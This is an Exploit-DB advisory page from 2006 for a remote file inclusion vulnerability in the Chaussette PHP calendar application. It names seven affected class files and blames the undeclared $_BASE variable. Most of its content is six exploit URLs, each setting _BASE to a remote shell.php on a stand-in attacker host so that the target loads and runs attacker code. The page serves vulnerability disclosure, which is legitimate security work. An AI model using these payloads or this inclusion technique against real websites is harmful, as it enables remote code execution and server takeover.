Chaussette <= 080706 (_BASE) Remote File Include Vulnerabilities



EDB-ID: 2169 CVE: 2006-4159 OSVDB-ID: 28270
Author: Drago84 Published: 2006-08-10 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next 
Chaussette Remote File Inclusion

CreW: ToXiC
Bug Found By Drago84

Source Code:
http://freshmeat.net/redir/chaussette/64502/url_zip/chaussette.zip

Page Affect
/Classes/Evenement.php
/Classes/Event.php
/Classes/Event_for_month.php
/Classes/Event_for_month_per_day.php
/Classes/Event_for_week.php
/Classes/My_Log.php
/Classes/My_Smarty.php

Problem Is :
$_BASE Not Declare;


ExP:
http://www.site.com/dir_Chaussette/Classes/Evenement.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/Event.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/Event_for_month.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/Event_for_week.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/My_Log.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/My_Smarty.php?_BASE=http://www.evalsite.com/shell.php

Greatz: Str0ke

# milw0rm.com [2006-08-10]






Comments

No comments so far